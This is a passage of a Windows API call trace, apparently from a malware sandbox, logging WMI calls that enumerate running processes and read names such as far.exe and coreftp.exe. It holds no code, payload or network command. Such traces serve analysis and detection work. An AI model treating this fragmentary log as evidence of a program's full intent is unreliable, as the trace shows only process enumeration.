(This=0x561a9e0, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2960\"") returned 0x0 [0214.087] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38f000 | out: puCount=0x38f000*=0x2) returned 0x0 [0214.087] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0x0, pszText=0x0 | out: puBuffLength=0x38effc*=0xf, pszText=0x0) returned 0x0 [0214.087] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0xf, pszText="00000000000000" | out: puBuffLength=0x38effc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0214.087] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38efcc | out: puCount=0x38efcc*=0x2) returned 0x0 [0214.087] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0x0, pszText=0x0 | out: puBuffLength=0x38efc8*=0xf, pszText=0x0) returned 0x0 [0214.087] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0xf, pszText="00000000000000" | out: puBuffLength=0x38efc8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0214.087] IWbemClassObject:Get (in: This=0x560e7c8, wszName="Name", lFlags=0, pVal=0x38efc8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x268cd30*=0, plFlavor=0x268cd34*=0 | out: pVal=0x38efc8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="far.exe", varVal2=0x0), pType=0x268cd30*=8, plFlavor=0x268cd34*=0) returned 0x0 [0214.087] SysStringByteLen (bstr="far.exe") returned 0xe [0214.087] SysStringByteLen (bstr="far.exe") returned 0xe [0214.087] IWbemClassObject:Get (in: This=0x560e7c8, wszName="Name", lFlags=0, pVal=0x38efd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x268cd30*=8, plFlavor=0x268cd34*=0 | out: pVal=0x38efd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="far.exe", varVal2=0x0), pType=0x268cd30*=8, plFlavor=0x268cd34*=0) returned 0x0 [0214.087] SysStringByteLen (bstr="far.exe") returned 0xe [0214.087] SysStringByteLen (bstr="far.exe") returned 0xe [0214.087] CoTaskMemAlloc (cb=0x4) returned 0x561bfe8 [0214.087] IEnumWbemClassObject:Next (in: This=0x544f098, lTimeout=-1, uCount=0x1, apObjects=0x561bfe8, puReturned=0x267acc0 | out: apObjects=0x561bfe8*=0x562dd38, puReturned=0x267acc0*=0x1) returned 0x0 [0214.088] IUnknown:QueryInterface (in: This=0x562dd38, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e62c | out: ppvObject=0x38e62c*=0x562dd38) returned 0x0 [0214.089] IUnknown:QueryInterface (in: This=0x562dd38, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e5e0 | out: ppvObject=0x38e5e0*=0x0) returned 0x80004002 [0214.089] IUnknown:QueryInterface (in: This=0x562dd38, riid=0x725f1e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38e408 | out: ppvObject=0x38e408*=0x0) returned 0x80004002 [0214.089] IUnknown:AddRef (This=0x562dd38) returned 0x3 [0214.089] IUnknown:QueryInterface (in: This=0x562dd38, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38df3c | out: ppvObject=0x38df3c*=0x0) returned 0x80004002 [0214.089] IUnknown:QueryInterface (in: This=0x562dd38, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38deec | out: ppvObject=0x38deec*=0x0) returned 0x80004002 [0214.089] IUnknown:QueryInterface (in: This=0x562dd38, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38def8 | out: ppvObject=0x38def8*=0x562dd3c) returned 0x0 [0214.089] IMarshal:GetUnmarshalClass (in: This=0x562dd3c, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38df00 | out: pCid=0x38df00*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0214.089] IUnknown:Release (This=0x562dd3c) returned 0x3 [0214.089] CoGetContextToken (in: pToken=0x38df58 | out: pToken=0x38df58) returned 0x0 [0214.089] CoGetContextToken (in: pToken=0x38e36c | out: pToken=0x38e36c) returned 0x0 [0214.089] IUnknown:QueryInterface (in: This=0x562dd38, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e3ec | out: ppvObject=0x38e3ec*=0x0) returned 0x80004002 [0214.089] IUnknown:Release (This=0x562dd38) returned 0x2 [0214.089] CoGetContextToken (in: pToken=0x38e954 | out: pToken=0x38e954) returned 0x0 [0214.090] CoGetContextToken (in: pToken=0x38e8b4 | out: pToken=0x38e8b4) returned 0x0 [0214.090] IUnknown:QueryInterface (in: This=0x562dd38, riid=0x38e984*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x38e980 | out: ppvObject=0x38e980*=0x562dd38) returned 0x0 [0214.090] IUnknown:AddRef (This=0x562dd38) returned 0x4 [0214.090] IUnknown:Release (This=0x562dd38) returned 0x3 [0214.090] IUnknown:Release (This=0x562dd38) returned 0x2 [0214.090] CoTaskMemFree (pv=0x561bfe8) [0214.090] CoGetContextToken (in: pToken=0x38ecc4 | out: pToken=0x38ecc4) returned 0x0 [0214.090] IUnknown:AddRef (This=0x562dd38) returned 0x3 [0214.090] IWbemClassObject:Get (in: This=0x562dd38, wszName="__GENUS", lFlags=0, pVal=0x38efc4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f044*=0, plFlavor=0x38f040*=0 | out: pVal=0x38efc4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x38f044*=3, plFlavor=0x38f040*=64) returned 0x0 [0214.091] IWbemClassObject:Get (in: This=0x562dd38, wszName="__PATH", lFlags=0, pVal=0x38efa8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f02c*=0, plFlavor=0x38f028*=0 | out: pVal=0x38efa8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2968\"", varVal2=0x0), pType=0x38f02c*=8, plFlavor=0x38f028*=64) returned 0x0 [0214.091] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2968\"") returned 0x66 [0214.091] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2968\"") returned 0x66 [0214.091] CoGetObjectContext (in: riid=0x25c02c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38efd4 | out: ppv=0x38efd4*=0x6d0cac) returned 0x0 [0214.091] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6d0cac, pAptType=0x38efcc | out: pAptType=0x38efcc*=1) returned 0x0 [0214.091] IUnknown:QueryInterface (in: This=0x6d0cac, riid=0x25c02ac*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x38efd0 | out: ppvObject=0x38efd0*=0x0) returned 0x80004002 [0214.091] IUnknown:Release (This=0x6d0cac) returned 0x1 [0214.092] CoGetClassObject (in: rclsid=0x55b3f5c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x72656bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38e940 | out: ppv=0x38e940*=0x561bfe8) returned 0x0 [0214.092] WbemDefPath:IUnknown:QueryInterface (in: This=0x561bfe8, riid=0x7261dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38eb58 | out: ppvObject=0x38eb58*=0x0) returned 0x80004002 [0214.092] WbemDefPath:IClassFactory:CreateInstance (in: This=0x561bfe8, pUnkOuter=0x0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38eb64 | out: ppvObject=0x38eb64*=0x561aac0) returned 0x0 [0214.092] WbemDefPath:IUnknown:Release (This=0x561bfe8) returned 0x0 [0214.092] WbemDefPath:IUnknown:QueryInterface (in: This=0x561aac0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e784 | out: ppvObject=0x38e784*=0x561aac0) returned 0x0 [0214.092] WbemDefPath:IUnknown:QueryInterface (in: This=0x561aac0, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e738 | out: ppvObject=0x38e738*=0x0) returned 0x80004002 [0214.093] WbemDefPath:IUnknown:AddRef (This=0x561aac0) returned 0x3 [0214.093] WbemDefPath:IUnknown:QueryInterface (in: This=0x561aac0, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38e094 | out: ppvObject=0x38e094*=0x0) returned 0x80004002 [0214.093] WbemDefPath:IUnknown:QueryInterface (in: This=0x561aac0, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38e044 | out: ppvObject=0x38e044*=0x0) returned 0x80004002 [0214.093] WbemDefPath:IUnknown:QueryInterface (in: This=0x561aac0, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e050 | out: ppvObject=0x38e050*=0x561bff8) returned 0x0 [0214.093] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x561bff8, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38e058 | out: pCid=0x38e058*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0214.093] WbemDefPath:IUnknown:Release (This=0x561bff8) returned 0x3 [0214.093] CoGetContextToken (in: pToken=0x38e0b0 | out: pToken=0x38e0b0) returned 0x0 [0214.093] CoGetContextToken (in: pToken=0x38e4c4 | out: pToken=0x38e4c4) returned 0x0 [0214.093] WbemDefPath:IUnknown:QueryInterface (in: This=0x561aac0, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e544 | out: ppvObject=0x38e544*=0x0) returned 0x80004002 [0214.093] WbemDefPath:IUnknown:Release (This=0x561aac0) returned 0x2 [0214.093] WbemDefPath:IUnknown:Release (This=0x561aac0) returned 0x1 [0214.093] CoGetContextToken (in: pToken=0x38ee54 | out: pToken=0x38ee54) returned 0x0 [0214.093] CoGetContextToken (in: pToken=0x38edb4 | out: pToken=0x38edb4) returned 0x0 [0214.093] WbemDefPath:IUnknown:QueryInterface (in: This=0x561aac0, riid=0x38ee84*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x38ee80 | out: ppvObject=0x38ee80*=0x561aac0) returned 0x0 [0214.093] WbemDefPath:IUnknown:AddRef (This=0x561aac0) returned 0x3 [0214.093] WbemDefPath:IUnknown:Release (This=0x561aac0) returned 0x2 [0214.093] WbemDefPath:IWbemPath:SetText (This=0x561aac0, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2968\"") returned 0x0 [0214.094] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38f000 | out: puCount=0x38f000*=0x2) returned 0x0 [0214.094] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0x0, pszText=0x0 | out: puBuffLength=0x38effc*=0xf, pszText=0x0) returned 0x0 [0214.094] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0xf, pszText="00000000000000" | out: puBuffLength=0x38effc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0214.094] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38efcc | out: puCount=0x38efcc*=0x2) returned 0x0 [0214.094] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0x0, pszText=0x0 | out: puBuffLength=0x38efc8*=0xf, pszText=0x0) returned 0x0 [0214.094] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0xf, pszText="00000000000000" | out: puBuffLength=0x38efc8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0214.094] IWbemClassObject:Get (in: This=0x562dd38, wszName="Name", lFlags=0, pVal=0x38efc8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x268d58c*=0, plFlavor=0x268d590*=0 | out: pVal=0x38efc8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="coreftp.exe", varVal2=0x0), pType=0x268d58c*=8, plFlavor=0x268d590*=0) returned 0x0 [0214.094] SysStringByteLen (bstr="coreftp.exe") returned 0x16 [0214.094] SysStringByteLen (bstr="coreftp.exe") returned 0x16 [0214.094] IWbemClassObject:Get (in: This=0x562dd38, wszName="Name", lFlags=0, pVal=0x38efd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x268d58c*=8, plFlavor=0x268d590*=0 | out: pVal=0x38efd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="coreftp.exe", varVal2=0x0), pType=0x268d58c*=8, plFlavor=0x268d590*=0) returned 0x0 [0214.094] SysStringByteLen (bstr="coreftp.exe") returned 0x16 [0214.094] SysStringByteLen (bstr="coreftp.exe") returned 0x16 [0214.094] CoTaskMemAlloc (cb=0x4) returned 0x561c028 [0214.094] IEnumWbemClassObject:Next (in: This=0x544f098, lTimeout=-1, uCount=0x1, apObjects=0x561c028, puReturned=0x267acc0 | out: apObjects=0x561c028*=0x562ded0, puReturned=0x267acc0*=0x1) returned 0x0 [0214.169] IUnknown:QueryInterface (in: This=0x562ded0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e62c | out: ppvObject=0x38e62c*=0x562ded0) returned 0x0 [0214.169] IUnknown:QueryInterface (in: This=0x562ded0, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e5e0 | out: ppvObject=0x38e5e0*=0x0) returned 0x80004002 [0214.169] IUnknown:QueryInterface (in: This=0x562ded0, riid=0x725f1e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38e408 | out: ppvObject=0x38e408*=0x0) returned 0x80004002 [0214.169] IUnknown:AddRef (This=0x562ded0) returned 0x3 [0214.169] IUnknown:QueryInterface (in: This=0x562ded0, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38df3c | out: ppvObject=0x38df3c*=0x0) returned 0x80004002 [0214.169] IUnknown:QueryInterface (in: This=0x562ded0, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38deec | out: ppvObject=0x38deec*=0x0) returned 0x80004002 [0214.169] IUnknown:QueryInterface (in: This=0x562ded0, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38def8 | out: ppvObject=0x38def8*=0x562ded4) returned 0x0 [0214.169] IMarshal:GetUnmarshalClass (in: This=0x562ded4, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38df00 | out: pCid=0x38df00*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0214.169] IUnknown:Release (This=0x562ded4) returned 0x3 [0214.169] CoGetContextToken (in: pToken=0x38df58 | out: pToken=0x38df58) returned 0x0 [0214.169] CoGetContextToken (in: pToken=0x38e36c | out: pToken=0x38e36c) returned 0x0 [0214.170] IUnknown:QueryInterface (in: This=0x562ded0, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e3ec | out: ppvObject=0x38e3ec*=0x0) returned 0x80004002 [0214.170] IUnknown:Release (This=0x562ded0) returned 0x2 [0214.170] CoGetContextToken (in: pToken=0x38e954 | out: pToken=0x38e954) returned 0x0 [0214.170] CoGetContextToken (in: pToken=0x38e8b4 | out: pToken=0x38e8b4) returned 0x0 [0214.170] IUnknown:QueryInterface (in: This=0x562ded0, riid=0x38e984*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x38e980 | out: ppvObject=0x38e980*=0x562ded0) returned 0x0 [0214.170] IUnknown:AddRef (This=0x562ded0) returned 0x4 [0214.170] IUnknown:Release (This=0x562ded0) returned 0x3 [0214.170] IUnknown:Release (This=0x562ded0) returned 0x2 [0214.170] CoTaskMemFree (pv=0x561c028) [0214.170] CoGetContextToken (in: pToken=0x38ecc4 | out: pToken=0x38ecc4) returned 0x0 [0214.170] IUnknown:AddRef (This=0x562ded0) returned 0x3 [0214.170] IWbemClassObject:Get (in: This=0x562ded0, wszName="__GENUS", lFlags=0, pVal=0x38efc4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f044*=0, plFlavor=0x38f040*=0 | out: pVal=0x38efc4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x38f044*=3, plFlavor=0x38f040*=64) returned 0x0 [0214.171] IWbemClassObject:Get (in: This=0x562ded0, wszName="__PATH", lFlags=0, pVal=0x38efa8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f02c*=0, plFlavor=0x38f028*=0 | out: pVal=0x38efa8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2976\"", varVal2=0x0), pType=0x38f02c*=8, plFlavor=0x38f028*=64) returned 0x0 [0214.171] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2976\"") returned 0x66 [0214.171] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2976\"") returned 0x66 [0214.171] CoGetObjectContext (in: riid=0x25c02c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38efd4 | out: ppv=0x38efd4*=0x6d0cac) returned 0x0 [0214.171] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6d0cac, pAptType=0x38efcc | out: pAptType=0x38efcc*=1) returned 0x0 [0214.171] IUnknown:QueryInterface (in: This=0x6d0cac, riid=0x25c02ac*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x38efd0 | out: ppvObject=0x38efd0*=0x0) returned 0x80004002 [0214.171] IUnknown:Release (This=0x6d0cac) returned 0x1 [0214.172] CoGetClassObject (in: rclsid=0x55b3f5c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x72656bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38e940 | out: ppv=0x38e940*=0x561c028) returned 0x0 [0214.172] WbemDefPath:IUnknown:QueryInterface (in: This=0x561c028, riid=0x7261dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38eb58 | out: ppvObject=0x38eb58*=0x0) returned 0x80004002 [0214.172] WbemDefPath:IClassFactory:CreateInstance (in: This=0x561c028, pUnkOuter=0x0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38eb64 | out: ppvObject=0x38eb64*=0x561aba0) returned 0x0 [0214.173] WbemDefPath:IUnknown:Release (This=0x561c028) returned 0x0 [0214.173] WbemDefPath:IUnknown:QueryInterface (in: This=0x561aba0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e784 | out: ppvObject=0x38e784*=0x561aba0) returned 0x0 [0214.173] WbemDefPath:IUnknown:QueryInterface (in: This=0x561aba0, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e738 | out: ppvObject=0x38e738*=0x0) returned 0x80004002 [0214.173] WbemDefPath:IUnknown:AddRef (This=0x561aba0) returned 0x3 [0214.173] WbemDefPath:IUnknown:QueryInterface (in: This=0x561aba0, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38e094 | out: ppvObject=0x38e094*=0x0) returned 0x80004002 [0214.173] WbemDefPath:IUnknown:QueryInterface (in: This=0x561aba0, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38e044 | out: ppvObject=0x38e044*=0x0) returned 0x80004002 [0214.173] WbemDefPath:IUnknown:QueryInterface (in: This=0x561aba0, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e050 | out: ppvObject=0x38e050*=0x561c038) returned 0x0 [0214.173] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x561c038, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38e058 | out: pCid=0x38e058*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0214.173] WbemDefPath:IUnknown:Release (This=0x561c038) returned 0x3 [0214.173] CoGetContextToken (in: pToken=0x38e0b0 | out: pToken=0x38e0b0) returned 0x0 [0214.173] CoGetContextToken (in: pToken=0x38e4c4 | out: pToken=0x38e4c4) returned 0x0 [0214.173] WbemDefPath:IUnknown:QueryInterface (in: This=0x561aba0, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e544 | out: ppvObject=0x38e544*=0x0) returned 0x80004002 [0214.174] 